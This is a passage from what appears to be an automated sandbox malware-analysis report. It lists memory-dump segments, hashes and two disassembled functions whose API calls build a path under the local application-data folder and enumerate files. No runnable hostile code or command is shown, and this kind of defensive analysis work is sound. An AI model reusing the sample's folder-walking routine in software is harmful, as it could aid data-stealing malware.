                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: 64c4249a4f102005289d36860de8948283fc2d00624280653f3431d19026882e
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: C1415972900209EFEF16DF98DD81AEEBBB5BF48314F198099F90466221D7359950EF50
                                      Function 00F25190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F251CA
                                      • lstrcat.KERNEL32(?,00F31058), ref: 00F251E7
                                      • lstrcat.KERNEL32(?,01D88F78), ref: 00F251FB
                                      • lstrcat.KERNEL32(?,00F3105C), ref: 00F2520D
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24B7C
                                        • Part of subcall function 00F24B60: FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                        • Part of subcall function 00F24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                        • Part of subcall function 00F24B60: FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: d6163158e0c3707a45f58f41806a59402de703f979f68164b4396861ba90bd83
                                      • Instruction ID: c278d9ff4aa02287202b8be3a314b4b84f164d72ab2f2d5fcaab3223a0d7ceb6
                                      • Opcode Fuzzy Hash: d6163158e0c3707a45f58f41806a59402de703f979f68164b4396861ba90bd83
                                      • Instruction Fuzzy Hash: 3921DDB6900218A7DB28F7F0EC52EED737CAB94300F404554F655961C5EF7896C8DB92